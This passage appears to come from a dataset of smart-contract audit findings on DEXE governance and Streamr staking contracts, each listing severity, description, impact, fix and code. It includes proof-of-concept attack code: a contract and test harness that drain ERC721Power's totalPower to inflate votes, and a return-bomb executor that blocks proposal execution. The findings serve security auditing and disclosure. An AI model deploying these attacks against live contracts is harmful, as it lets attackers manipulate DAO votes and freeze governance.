Or set them to default if it is first iteration\\n // @audit both 0 for non-existent tokenId\\n uint64 lastUpdate = nftInfos[tokenId].lastUpdate;\\n uint256 currentPower = nftInfos[tokenId].currentPower;\\n\\n if (lastUpdate == 0) {\\n lastUpdate = powerCalcStartTimestamp;\\n // @audit currentPower set to maxNftPower which\\n // is just the default maxPower even for non-existent tokenId!\\n currentPower = maxNftPower;\\n }\\n\\n // Calculate reduction amount\\n uint256 powerReductionPercent = reductionPercent * (block.timestamp - lastUpdate);\\n uint256 powerReduction = currentPower.min(maxNftPower.percentage(powerReductionPercent));\\n uint256 newPotentialPower = currentPower - powerReduction;\\n\\n // @audit returns newPotentialPower slightly reduced\\n // from maxPower for non-existent tokenId\\n if (minNftPower <= newPotentialPower) {\\n return newPotentialPower;\\n }\\n\\n if (minNftPower <= currentPower) {\\n return minNftPower;\\n }\\n\\n return currentPower;\\n}\\n\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit newPower > 0 for non-existent tokenId\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since\\n // tokenId doesn't exist, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit then totalPower is increased by newPower where:\\n // 0 < newPower < maxPower hence net decrease to totalPower\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n nftInfo.currentPower = newPower;\\n}\\n```\\n",`ERC721Power::recalculateNftPower()` should revert when called for non-existent nfts.,"`ERC721Power::totalPower` lowered to near 0. 
This can be used to artificially increase voting power since `totalPower` is read when creating the snapshot and is used as the divisor in `GovUserKeeper::getNftsPowerInTokensBySnapshot()`.\\nThis attack is pretty devastating as `ERC721Power::totalPower` can never be increased since the `currentPower` of individual nfts can only ever be decreased; there is no way to ""undo"" this attack unless the nft contract is replaced with a new contract.\\nProof of Concept: Add attack contract mock/utils/ERC721PowerAttack.sol:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.4;\\n\\nimport ""../../gov/ERC721/ERC721Power.sol"";\\n\\nimport ""hardhat/console.sol"";\\n\\ncontract ERC721PowerAttack {\\n // this attack can decrease ERC721Power::totalPower close to 0\\n //\\n // this attack works when block.timestamp > nftPower.powerCalcStartTimestamp\\n // by taking advantage calling recalculateNftPower for non-existent nfts\\n function attack2(\\n address nftPowerAddr,\\n uint256 initialTotalPower,\\n uint256 lastTokenId,\\n uint256 attackIterations\\n ) external {\\n ERC721Power nftPower = ERC721Power(nftPowerAddr);\\n\\n // verify attack starts on the correct block\\n require(\\n block.timestamp > nftPower.powerCalcStartTimestamp(),\\n ""ERC721PowerAttack: attack2 requires block.timestamp > nftPower.powerCalcStartTimestamp""\\n );\\n\\n // verify totalPower() correct at starting block\\n require(\\n nftPower.totalPower() == initialTotalPower,\\n ""ERC721PowerAttack: incorrect initial totalPower""\\n );\\n\\n // output totalPower before attack\\n console.log(nftPower.totalPower());\\n\\n // keep calling recalculateNftPower() for non-existent nfts\\n // this lowers ERC721Power::totalPower() every time\\n // can't get it to 0 due to underflow but can get close enough\\n for (uint256 i; i < attackIterations; ) {\\n nftPower.recalculateNftPower(++lastTokenId);\\n unchecked {\\n ++i;\\n }\\n }\\n\\n // output totalPower after attack\\n 
console.log(nftPower.totalPower());\\n\\n // original totalPower : 10000000000000000000000000000\\n // current totalPower : 900000000000000000000000000\\n require(\\n nftPower.totalPower() == 900000000000000000000000000,\\n ""ERC721PowerAttack: after attack finished totalPower should equal 900000000000000000000000000""\\n );\\n }\\n}\\n```\\n\\nAdd test harness to ERC721Power.test.js:\\n```\\n describe(""audit attacker can manipulate ERC721Power totalPower"", () => {\\n it(""audit attack 2 dramatically lowers ERC721Power totalPower"", async () => {\\n // deploy the ERC721Power nft contract with:\\n // max power of each nft = 100\\n // power reduction 10%\\n // required collateral = 100\\n let maxPowerPerNft = toPercent(""100"");\\n let requiredCollateral = wei(""100"");\\n let powerCalcStartTime = (await getCurrentBlockTime()) + 1000;\\n\\n // create power nft contract\\n await deployNft(powerCalcStartTime, maxPowerPerNft, toPercent(""10""), requiredCollateral);\\n\\n // ERC721Power::totalPower should be zero as no nfts yet created\\n assert.equal((await nft.totalPower()).toFixed(), toPercent(""0"").times(1).toFixed());\\n\\n // create the attack contract\\n const ERC721PowerAttack = artifacts.require(""ERC721PowerAttack"");\\n let attackContract = await ERC721PowerAttack.new();\\n\\n // create 10 power nfts for SECOND\\n await nft.safeMint(SECOND, 1);\\n await nft.safeMint(SECOND, 2);\\n await nft.safeMint(SECOND, 3);\\n await nft.safeMint(SECOND, 4);\\n await nft.safeMint(SECOND, 5);\\n await nft.safeMint(SECOND, 6);\\n await nft.safeMint(SECOND, 7);\\n await nft.safeMint(SECOND, 8);\\n await nft.safeMint(SECOND, 9);\\n await nft.safeMint(SECOND, 10);\\n\\n // verify ERC721Power::totalPower has been increased by max power for all nfts\\n assert.equal((await nft.totalPower()).toFixed(), maxPowerPerNft.times(10).toFixed());\\n\\n // fast forward time to just after the start of power calculation\\n await setTime(powerCalcStartTime);\\n\\n // launch the attack\\n 
await attackContract.attack2(nft.address, maxPowerPerNft.times(10).toFixed(), 10, 91);\\n });\\n });\\n```\\n\\nRun attack with: `npx hardhat test --grep ""audit attack 2 dramatically lowers ERC721Power totalPower""`","```\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit 0 for non-existent tokenId\\n uint256 collateral = nftInfos[tokenId].currentCollateral;\\n\\n // Calculate the minimum possible power based on the collateral of the nft\\n // @audit returns default maxPower for non-existent tokenId\\n uint256 maxNftPower = getMaxPowerForNft(tokenId);\\n uint256 minNftPower = maxNftPower.ratio(collateral, getRequiredCollateralForNft(tokenId));\\n minNftPower = maxNftPower.min(minNftPower);\\n\\n // Get last update and current power. Or set them to default if it is first iteration\\n // @audit both 0 for non-existent tokenId\\n uint64 lastUpdate = nftInfos[tokenId].lastUpdate;\\n uint256 currentPower = nftInfos[tokenId].currentPower;\\n\\n if (lastUpdate == 0) {\\n lastUpdate = powerCalcStartTimestamp;\\n // @audit currentPower set to maxNftPower which\\n // is just the default maxPower even for non-existent tokenId!\\n currentPower = maxNftPower;\\n }\\n\\n // Calculate reduction amount\\n uint256 powerReductionPercent = reductionPercent * (block.timestamp - lastUpdate);\\n uint256 powerReduction = currentPower.min(maxNftPower.percentage(powerReductionPercent));\\n uint256 newPotentialPower = currentPower - powerReduction;\\n\\n // @audit returns newPotentialPower slightly reduced\\n // from maxPower for non-existent tokenId\\n if (minNftPower <= newPotentialPower) {\\n return newPotentialPower;\\n }\\n\\n if (minNftPower <= currentPower) {\\n return minNftPower;\\n }\\n\\n return currentPower;\\n}\\n\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n if (block.timestamp < powerCalcStartTimestamp) {\\n 
return 0;\\n }\\n\\n // @audit newPower > 0 for non-existent tokenId\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since\\n // tokenId doesn't exist, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit then totalPower is increased by newPower where:\\n // 0 < newPower < maxPower hence net decrease to totalPower\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n nftInfo.currentPower = newPower;\\n}\\n```\\n" +`GovPool::delegateTreasury` does not verify transfer of tokens and NFTs to delegatee leading to potential voting manipulation,high,"`GovPool::delegateTreasury` transfers ERC20 tokens & specific nfts from DAO treasury to `govUserKeeper`. Based on this transfer, the `tokenBalance` and `nftBalance` of the delegatee is increased. This allows a delegatee to use this delegated voting power to vote in critical proposals.\\nAs the following snippet of `GovPool::delegateTreasury` function shows, there is no verification that the tokens and nfts are actually transferred to the `govUserKeeper`. 
It is implicitly assumed that a successful transfer is completed and subsequently, the voting power of the delegatee is increased.\\n```\\n function delegateTreasury(\\n address delegatee,\\n uint256 amount,\\n uint256[] calldata nftIds\\n ) external override onlyThis {\\n require(amount > 0 || nftIds.length > 0, ""Gov: empty delegation"");\\n require(getExpertStatus(delegatee), ""Gov: delegatee is not an expert"");\\n\\n _unlock(delegatee);\\n\\n if (amount != 0) {\\n address token = _govUserKeeper.tokenAddress();\\n\\n > IERC20(token).transfer(address(_govUserKeeper), amount.from18(token.decimals())); //@audit no check if tokens are actually transferred\\n\\n _govUserKeeper.delegateTokensTreasury(delegatee, amount);\\n }\\n\\n if (nftIds.length != 0) {\\n IERC721 nft = IERC721(_govUserKeeper.nftAddress());\\n\\n for (uint256 i; i < nftIds.length; i++) {\\n > nft.safeTransferFrom(address(this), address(_govUserKeeper), nftIds[i]); //-n no check if nft's are actually transferred\\n }\\n\\n _govUserKeeper.delegateNftsTreasury(delegatee, nftIds);\\n }\\n\\n _revoteDelegated(delegatee, VoteType.TreasuryVote);\\n\\n emit DelegatedTreasury(delegatee, amount, nftIds, true);\\n }\\n```\\n\\nThis could lead to a dangerous situation where a malicious DAO treasury can increase voting power manifold while actually transferring tokens only once (or even, not transfer at all). This breaks the invariance that the total accounting balances in `govUserKeeper` contract must match the actual token balances in that contract.","Since DEXE starts out with a trustless assumption that does not give any special trust privileges to a DAO treasury, it is always prudent to follow the ""trust but verify"" approach when it comes to non-standard tokens, both ERC20 and ERC721. 
To that extent, consider adding verification of token & nft balance increase before/after token transfer.","Since both the ERC20 and ERC721 token implementations are controlled by the DAO, and since we are dealing with upgradeable token contracts, there is a potential rug-pull vector created by the implicit transfer assumption above.","```\\n function delegateTreasury(\\n address delegatee,\\n uint256 amount,\\n uint256[] calldata nftIds\\n ) external override onlyThis {\\n require(amount > 0 || nftIds.length > 0, ""Gov: empty delegation"");\\n require(getExpertStatus(delegatee), ""Gov: delegatee is not an expert"");\\n\\n _unlock(delegatee);\\n\\n if (amount != 0) {\\n address token = _govUserKeeper.tokenAddress();\\n\\n > IERC20(token).transfer(address(_govUserKeeper), amount.from18(token.decimals())); //@audit no check if tokens are actually transferred\\n\\n _govUserKeeper.delegateTokensTreasury(delegatee, amount);\\n }\\n\\n if (nftIds.length != 0) {\\n IERC721 nft = IERC721(_govUserKeeper.nftAddress());\\n\\n for (uint256 i; i < nftIds.length; i++) {\\n > nft.safeTransferFrom(address(this), address(_govUserKeeper), nftIds[i]); //-n no check if nft's are actually transferred\\n }\\n\\n _govUserKeeper.delegateNftsTreasury(delegatee, nftIds);\\n }\\n\\n _revoteDelegated(delegatee, VoteType.TreasuryVote);\\n\\n emit DelegatedTreasury(delegatee, amount, nftIds, true);\\n }\\n```\\n" +Voting to change `RewardsInfo::voteRewardsCoefficient` has an unintended side-effect of retrospectively changing voting rewards for active proposals,medium,"`GovSettings::editSettings` is one of the functions that can be executed via an internal proposal. When this function is called, setting are validated via `GovSettings::_validateProposalSettings`. This function does not check the value of `RewardsInfo::voteRewardsCoefficient` while updating the settings. 
There is neither a floor nor a cap for this setting.\\nHowever, we've noted that this coefficient amplifies voting rewards as calculated in the `GovPoolRewards::_getInitialVotingRewards` shown below.\\n```\\n function _getInitialVotingRewards(\\n IGovPool.ProposalCore storage core,\\n IGovPool.VoteInfo storage voteInfo\\n ) internal view returns (uint256) {\\n (uint256 coreVotes, uint256 coreRawVotes) = voteInfo.isVoteFor\\n ? (core.votesFor, core.rawVotesFor)\\n : (core.votesAgainst, core.rawVotesAgainst);\\n\\n return\\n coreRawVotes.ratio(core.settings.rewardsInfo.voteRewardsCoefficient, PRECISION).ratio(\\n voteInfo.totalVoted,\\n coreVotes\\n ); //@audit -> initial rewards are calculated proportionate to the vote rewards coefficient\\n }\\n```\\n\\nThis has the unintended side-effect that for the same proposal, different voters can get paid different rewards based on when the reward was claimed. In the extreme case where `core.settings.rewardsInfo.voteRewardsCoefficient` is voted to 0, note that we have a situation where voters who claimed rewards before the update got paid as promised whereas voters who claimed later got nothing.",Consider freezing `voteRewardMultiplier` and the time of proposal creation. A prospective update of this setting via internal voting should not change rewards for old proposals.,"Updating `rewardsCoefficient` can lead to unfair reward distribution on old proposals. Since voting rewards for a given proposal are communicated upfront, this could lead to a situation where promised rewards to users are not honoured.\\nProof of Concept: N/A","```\\n function _getInitialVotingRewards(\\n IGovPool.ProposalCore storage core,\\n IGovPool.VoteInfo storage voteInfo\\n ) internal view returns (uint256) {\\n (uint256 coreVotes, uint256 coreRawVotes) = voteInfo.isVoteFor\\n ? 
(core.votesFor, core.rawVotesFor)\\n : (core.votesAgainst, core.rawVotesAgainst);\\n\\n return\\n coreRawVotes.ratio(core.settings.rewardsInfo.voteRewardsCoefficient, PRECISION).ratio(\\n voteInfo.totalVoted,\\n coreVotes\\n ); //@audit -> initial rewards are calculated proportionate to the vote rewards coefficient\\n }\\n```\\n" +Proposal execution can be DOSed with return bombs when calling untrusted execution contracts,medium,"`GovPool::execute` does not check for return bombs when executing a low-level call. A return bomb is a large bytes array that expands the memory so much that any attempt to execute the transaction will lead to an `out-of-gas` exception.\\nThis can create potentially risky outcomes for the DAO. One possible outcome is ""single sided"" execution, ie. ""actionsFor"" can be executed when voting is successful while ""actionsAgainst"" can be DOSed when voting fails.\\nA clever proposal creator can design a proposal in such a way that only `actionsFor` can be executed and any attempts to execute `actionsAgainst` will be permanently DOS'ed (refer POC contract). T\\nThis is possible because the `GovPoolExecute::execute` does a low level call on potentially untrusted `executor` assigned to a specific action.\\n```\\n function execute(\\n mapping(uint256 => IGovPool.Proposal) storage proposals,\\n uint256 proposalId\\n ) external {\\n // rest of code. 
// code\\n\\n for (uint256 i; i < actionsLength; i++) {\\n> (bool status, bytes memory returnedData) = actions[i].executor.call{\\n value: actions[i].value\\n }(actions[i].data); //@audit returnedData could expand memory and cause out-of-gas exception\\n\\n require(status, returnedData.getRevertMsg());\\n }\\n }\\n```\\n",Consider using `ExcessivelySafeCall` while calling untrusted contracts to avoid return bombs.,"Voting actions can be manipulated by a creator causing two potential issues:\\nProposal actions can never be executed even after successful voting\\nOne-sided execution where some actions can be executed while others can be DOSed\\nProof of Concept: Consider the following malicious proposal action executor contract. Note that when the proposal passes (isVotesFor = true), the `vote()` function returns empty bytes and when the proposal fails (isVotesFor = false), the same function returns a huge bytes array, effectively causing an ""out-of-gas"" exception to any caller.\\n```\\ncontract MaliciousProposalActionExecutor is IProposalValidator{\\n\\n function validate(IGovPool.ProposalAction[] calldata actions) external view override returns (bool valid){\\n valid = true;\\n }\\n\\n function vote(\\n uint256 proposalId,\\n bool isVoteFor,\\n uint256 voteAmount,\\n uint256[] calldata voteNftIds\\n ) external returns(bytes memory result){\\n\\n if(isVoteFor){\\n // @audit implement actions for successful vote\\n return """"; // 0 bytes\\n }\\n else{\\n // @audit implement actions for failed vote\\n\\n // Create a large bytes array\\n assembly{\\n revert(0, 1_000_000)\\n }\\n }\\n\\n }\\n}\\n```\\n","```\\n function execute(\\n mapping(uint256 => IGovPool.Proposal) storage proposals,\\n uint256 proposalId\\n ) external {\\n // rest of code. 
// code\\n\\n for (uint256 i; i < actionsLength; i++) {\\n> (bool status, bytes memory returnedData) = actions[i].executor.call{\\n value: actions[i].value\\n }(actions[i].data); //@audit returnedData could expand memory and cause out-of-gas exception\\n\\n require(status, returnedData.getRevertMsg());\\n }\\n }\\n```\\n" +Use low-level `call()` to prevent gas griefing attacks when returned data not required,low,"Using `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. For example:\\n```\\n(bool status, ) = payable(receiver).call{value: amount}("""");\\nrequire(status, ""Gov: failed to send eth"");\\n```\\n\\nIs the same as writing:\\n```\\n(bool status, bytes memory data ) = payable(receiver).call{value: amount}("""");\\nrequire(status, ""Gov: failed to send eth"");\\n```\\n\\nIn both cases the returned data will have to be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not required at all.","Use a low-level call when the returned data is not required, eg:\\n```\\nbool status;\\nassembly {\\n status := call(gas(), receiver, amount, 0, 0, 0, 0)\\n}\\n```\\n\\nConsider using ExcessivelySafeCall.",Contracts unnecessarily expose themselves to gas griefing attacks.,"```\\n(bool status, ) = payable(receiver).call{value: amount}("""");\\nrequire(status, ""Gov: failed to send eth"");\\n```\\n" +`abi.encodePacked()` should not be used with dynamic types when passing the result to a hash function such as `keccak256()`,low,"`abi.encodePacked()` should not be used with dynamic types when passing the result to a hash function such as `keccak256()`.\\nUse `abi.encode()` instead which will pad items to 32 bytes, which will prevent hash collisions (e.g. 
`abi.encodePacked(0x123,0x456)` => `0x123456` => `abi.encodePacked(0x1,0x23456)`, but `abi.encode(0x123,0x456)` => 0x0...1230...456).\\nUnless there is a compelling reason, `abi.encode` should be preferred. If there is only one argument to `abi.encodePacked()` it can often be cast to `bytes()` or `bytes32()` instead. If all arguments are strings and or bytes, `bytes.concat()` should be used instead.\\nProof of Concept:\\n```\\nFile: factory/PoolFactory.sol\\n\\n return keccak256(abi.encodePacked(deployer, poolName));\\n```\\n\\n```\\nFile: libs/gov/gov-pool/GovPoolOffchain.sol\\n\\n return keccak256(abi.encodePacked(resultsHash, block.chainid, address(this)));\\n```\\n\\n```\\nFile: user/UserRegistry.sol\\n\\n _signatureHashes[_documentHash][msg.sender] = keccak256(abi.encodePacked(signature));\\n```\\n",See description.,,"```\\nFile: factory/PoolFactory.sol\\n\\n return keccak256(abi.encodePacked(deployer, poolName));\\n```\\n" +A removal signature might be applied to the wrong `fid`.,medium,"A remove signature is used to remove a key from `fidOwner` using `KeyRegistry.removeFor()`. 
And the signature is verified in `_verifyRemoveSig()`.\\n```\\n function _verifyRemoveSig(address fidOwner, bytes memory key, uint256 deadline, bytes memory sig) internal {\\n _verifySig(\\n _hashTypedDataV4(\\n keccak256(abi.encode(REMOVE_TYPEHASH, fidOwner, keccak256(key), _useNonce(fidOwner), deadline))\\n ),\\n fidOwner,\\n deadline,\\n sig\\n );\\n }\\n```\\n\\nBut the signature doesn't specify a `fid` to remove and the below scenario would be possible.\\nAlice is an owner of `fid1` and she created a removal signature to remove a `key` but it's not used yet.\\nFor various reasons, she became an owner of `fid2`.\\n`fid2` has a `key` also but she doesn't want to remove it.\\nBut if anyone calls `removeFor()` with her previous signature, the `key` will be removed from `fid2` unexpectedly.\\nOnce a key is removed, `KeyState` will be changed to `REMOVED` and anyone including the owner can't retrieve it.",The removal signature should contain `fid` also to be invalidated for another `fid`.,A key remove signature might be used for an unexpected `fid`.,"```\\n function _verifyRemoveSig(address fidOwner, bytes memory key, uint256 deadline, bytes memory sig) internal {\\n _verifySig(\\n _hashTypedDataV4(\\n keccak256(abi.encode(REMOVE_TYPEHASH, fidOwner, keccak256(key), _useNonce(fidOwner), deadline))\\n ),\\n fidOwner,\\n deadline,\\n sig\\n );\\n }\\n```\\n" +`VoteKickPolicy._endVote()` might revert forever due to underflow,high,"In `onFlag()`, `targetStakeAtRiskWei[target]` might be less than the total rewards for the flagger/reviewers due to rounding.\\n```\\nFile: contracts\\OperatorTokenomics\\StreamrConfig.sol\\n /**\\n * Minimum amount to pay reviewers+flagger\\n * That is: minimumStakeWei >= (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) / slashingFraction\\n */\\n function minimumStakeWei() public view returns (uint) {\\n return (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) * 1 ether / slashingFraction;\\n }\\n```\\n\\nLet's 
assume `flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei = 100, StreamrConfig.slashingFraction = 0.03e18(3%), minimumStakeWei() = 1000 * 1e18 / 0.03e18 = 10000 / 3 = 3333.`\\nIf we suppose `stakedWei[target] = streamrConfig.minimumStakeWei()`, then `targetStakeAtRiskWei[target]` = 3333 * 0.03e18 / 1e18 = 99.99 = 99.\\nAs a result, `targetStakeAtRiskWei[target]` is less than total rewards(=100), and `_endVote()` will revert during the reward distribution due to underflow.\\nThe above scenario is possible only when there is a rounding during `minimumStakeWei` calculation. So it works properly with the default `slashingFraction = 10%`.",Always round the `minimumStakeWei()` up.,The `VoteKickPolicy` wouldn't work as expected and malicious operators won't be kicked forever.,```\\nFile: contracts\\OperatorTokenomics\\StreamrConfig.sol\\n /**\\n * Minimum amount to pay reviewers+flagger\\n * That is: minimumStakeWei >= (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) / slashingFraction\\n */\\n function minimumStakeWei() public view returns (uint) {\\n return (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) * 1 ether / slashingFraction;\\n }\\n```\\n +Possible overflow in `_payOutFirstInQueue`,high,"In `_payOutFirstInQueue()`, possible revert during `operatorTokenToDataInverse()`.\\n```\\nuint amountOperatorTokens = moduleCall(address(exchangeRatePolicy), abi.encodeWithSelector(exchangeRatePolicy.operatorTokenToDataInverse.selector, amountDataWei));\\n```\\n\\nIf a delegator calls `undelegate()` with `type(uint256).max`, `operatorTokenToDataInverse()` will revert due to uint overflow and the queue logic will be broken forever.\\n```\\n function operatorTokenToDataInverse(uint dataWei) external view returns (uint operatorTokenWei) {\\n return dataWei * this.totalSupply() / valueWithoutEarnings();\\n }\\n```\\n",We should cap `amountDataWei` before calling `operatorTokenToDataInverse()`.,The queue logic will be broken forever because 
`_payOutFirstInQueue()` keeps reverting.,"```\\nuint amountOperatorTokens = moduleCall(address(exchangeRatePolicy), abi.encodeWithSelector(exchangeRatePolicy.operatorTokenToDataInverse.selector, amountDataWei));\\n```\\n" +Wrong validation in `DefaultUndelegationPolicy.onUndelegate()`,high,"In `onUndelegate()`, it checks if the operator owner still holds at least `minimumSelfDelegationFraction` of total supply.\\n```\\n function onUndelegate(address delegator, uint amount) external {\\n // limitation only applies to the operator, others can always undelegate\\n if (delegator != owner) { return; }\\n\\n uint actualAmount = amount < balanceOf(owner) ? amount : balanceOf(owner); //@audit amount:DATA, balanceOf:Operator\\n uint balanceAfter = balanceOf(owner) - actualAmount;\\n uint totalSupplyAfter = totalSupply() - actualAmount;\\n require(1 ether * balanceAfter >= totalSupplyAfter * streamrConfig.minimumSelfDelegationFraction(), ""error_selfDelegationTooLow"");\\n }\\n```\\n\\nBut `amount` means the DATA token `amount` and `balanceOf(owner)` indicates the `Operator` token balance and it's impossible to compare them directly.",`onUndelegate()` should compare amounts after converting to the same token.,The operator owner wouldn't be able to undelegate because `onUndelegate()` works unexpectedly.,"```\\n function onUndelegate(address delegator, uint amount) external {\\n // limitation only applies to the operator, others can always undelegate\\n if (delegator != owner) { return; }\\n\\n uint actualAmount = amount < balanceOf(owner) ? 
amount : balanceOf(owner); //@audit amount:DATA, balanceOf:Operator\\n uint balanceAfter = balanceOf(owner) - actualAmount;\\n uint totalSupplyAfter = totalSupply() - actualAmount;\\n require(1 ether * balanceAfter >= totalSupplyAfter * streamrConfig.minimumSelfDelegationFraction(), ""error_selfDelegationTooLow"");\\n }\\n```\\n" +Malicious target can make `_endVote()` revert forever by forceUnstaking/staking again,high,"In `_endVote()`, we update `forfeitedStakeWei` or `lockedStakeWei[target]` according to the target's staking status.\\n```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function _endVote(address target) internal {\\n address flagger = flaggerAddress[target];\\n bool flaggerIsGone = stakedWei[flagger] == 0;\\n bool targetIsGone = stakedWei[target] == 0;\\n uint reviewerCount = reviewers[target].length;\\n // release stake locks before vote resolution so that slashings and kickings during resolution aren't affected\\n // if either the flagger or the target has forceUnstaked or been kicked, the lockedStakeWei was moved to forfeitedStakeWei\\n if (flaggerIsGone) {\\n forfeitedStakeWei -= flagStakeWei[target];\\n } else {\\n lockedStakeWei[flagger] -= flagStakeWei[target];\\n }\\n if (targetIsGone) {\\n forfeitedStakeWei -= targetStakeAtRiskWei[target];\\n } else {\\n lockedStakeWei[target] -= targetStakeAtRiskWei[target]; //@audit revert after forceUnstake() => stake() again\\n }\\n```\\n\\nWe consider the target is still active if he has a positive staking amount. But we don't know if he has unstaked and staked again, so the below scenario would be possible.\\nThe target staked 100 amount and a flagger reported him.\\nIn `onFlag()`, `lockedStakeWei[target]` = targetStakeAtRiskWei[target] = 100.\\nDuring the voting period, the target called `forceUnstake()`. 
Then `lockedStakeWei[target]` was reset to 0 in `Sponsorship._removeOperator()`.\\nAfter that, he stakes again and `_endVote()` will revert forever at L195 due to underflow.\\nAfter all, he won't be flagged again because the current flagging won't be finalized.\\nFurthermore, malicious operators would manipulate the above state by themselves to earn operator rewards without any risks.",Perform stake unlocks in `_endVote()` without relying on the current staking amounts.,Malicious operators can bypass the flagging system by reverting `_endVote()` forever.,"```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function _endVote(address target) internal {\\n address flagger = flaggerAddress[target];\\n bool flaggerIsGone = stakedWei[flagger] == 0;\\n bool targetIsGone = stakedWei[target] == 0;\\n uint reviewerCount = reviewers[target].length;\\n // release stake locks before vote resolution so that slashings and kickings during resolution aren't affected\\n // if either the flagger or the target has forceUnstaked or been kicked, the lockedStakeWei was moved to forfeitedStakeWei\\n if (flaggerIsGone) {\\n forfeitedStakeWei -= flagStakeWei[target];\\n } else {\\n lockedStakeWei[flagger] -= flagStakeWei[target];\\n }\\n if (targetIsGone) {\\n forfeitedStakeWei -= targetStakeAtRiskWei[target];\\n } else {\\n lockedStakeWei[target] -= targetStakeAtRiskWei[target]; //@audit revert after forceUnstake() => stake() again\\n }\\n```\\n" +"In `VoteKickPolicy.onFlag()`, `targetStakeAtRiskWei[target]` might be greater than `stakedWei[target]` and `_endVote()` would revert.",medium,"`targetStakeAtRiskWei[target]` might be greater than `stakedWei[target]` in `onFlag()`.\\n```\\ntargetStakeAtRiskWei[target] = max(stakedWei[target], streamrConfig.minimumStakeWei()) * streamrConfig.slashingFraction() / 1 ether;\\n```\\n\\nFor example,\\nAt the first time, `streamrConfig.minimumStakeWei()` = 100 and an operator(=target) has staked 
100.\\n`streamrConfig.minimumStakeWei()` was increased to 2000 after a reconfiguration.\\n`onFlag()` is called for target and `targetStakeAtRiskWei[target]` will be `max(100, 2000) * 10% = 200`.\\nIn `_endVote()`, `slashingWei = _kick(target, slashingWei)` will be 100 because target has staked 100 only.\\nSo it will revert due to underflow during the reward distribution.",`onFlag()` should check if a target has staked enough funds for rewards and handle separately if not.,Operators with small staked funds wouldn't be kicked forever.,"```\\ntargetStakeAtRiskWei[target] = max(stakedWei[target], streamrConfig.minimumStakeWei()) * streamrConfig.slashingFraction() / 1 ether;\\n```\\n" +Possible front running of `flag()`,medium,"The `target` might call `unstake()/forceUnstake()` before a flagger calls `flag()` to avoid a possible fund loss. Also, there would be no slash during the unstaking for `target` when it meets the `penaltyPeriodSeconds` requirement.\\n```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function onFlag(address target, address flagger) external {\\n require(flagger != target, ""error_cannotFlagSelf"");\\n require(voteStartTimestamp[target] == 0 && block.timestamp > protectionEndTimestamp[target], ""error_cannotFlagAgain""); // solhint-disable-line not-rely-on-time\\n require(stakedWei[flagger] >= minimumStakeOf(flagger), ""error_notEnoughStake"");\\n require(stakedWei[target] > 0, ""error_flagTargetNotStaked""); //@audit possible front run\\n```\\n",There is no straightforward mitigation but we could implement a kind of `delayed unstaking` logic for some percent of staking funds.,A malicious target would bypass the kick policy by front running.,"```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function onFlag(address target, address flagger) external {\\n require(flagger != target, ""error_cannotFlagSelf"");\\n require(voteStartTimestamp[target] == 0 && block.timestamp > 
protectionEndTimestamp[target], ""error_cannotFlagAgain""); // solhint-disable-line not-rely-on-time\\n require(stakedWei[flagger] >= minimumStakeOf(flagger), ""error_notEnoughStake"");\\n require(stakedWei[target] > 0, ""error_flagTargetNotStaked""); //@audit possible front run\\n```\\n" +"In `Operator._transfer()`, `onDelegate()` should be called after updating the token balances",medium,"In `_transfer()`, `onDelegate()` is called to validate the owner's `minimumSelfDelegationFraction` requirement.\\n```\\nFile: contracts\\OperatorTokenomics\\Operator.sol\\n // transfer creates a new delegator: check if the delegation policy allows this ""delegation""\\n if (balanceOf(to) == 0) {\\n if (address(delegationPolicy) != address(0)) {\\n moduleCall(address(delegationPolicy), abi.encodeWithSelector(delegationPolicy.onDelegate.selector, to)); //@audit\\nshould be called after _transfer()\\n }\\n }\\n super._transfer(from, to, amount);\\n```\\n\\nBut `onDelegate()` is called before updating the token balances and the below scenario would be possible.\\nThe operator owner has 100 shares(required minimum fraction). 
And there are no undelegation policies.\\nLogically, the owner shouldn't be able to transfer his 100 shares to a new delegator due to the min fraction requirement in `onDelegate()`.\\nBut if the owner calls `transfer(owner, to, 100)`, `balanceOf(owner)` will be 100 in `onDelegate()` and it will pass the requirement because it's called before `super._transfer()`.",`onDelegate()` should be called after `super._transfer()`.,"The operator owner might transfer his shares to other delegators in anticipation of slashing, to avoid slashing.","```\\nFile: contracts\\OperatorTokenomics\\Operator.sol\\n // transfer creates a new delegator: check if the delegation policy allows this ""delegation""\\n if (balanceOf(to) == 0) {\\n if (address(delegationPolicy) != address(0)) {\\n moduleCall(address(delegationPolicy), abi.encodeWithSelector(delegationPolicy.onDelegate.selector, to)); //@audit\\nshould be called after _transfer()\\n }\\n }\\n super._transfer(from, to, amount);\\n```\\n" +`onTokenTransfer` does not validate if the call is from the DATA token contract,medium,"`SponsorshipFactory::onTokenTransfer` and `OperatorFactory::onTokenTransfer` are used to handle the token transfer and contract deployment in a single transaction. But there is no validation that the call is from the DATA token contract and anyone can call 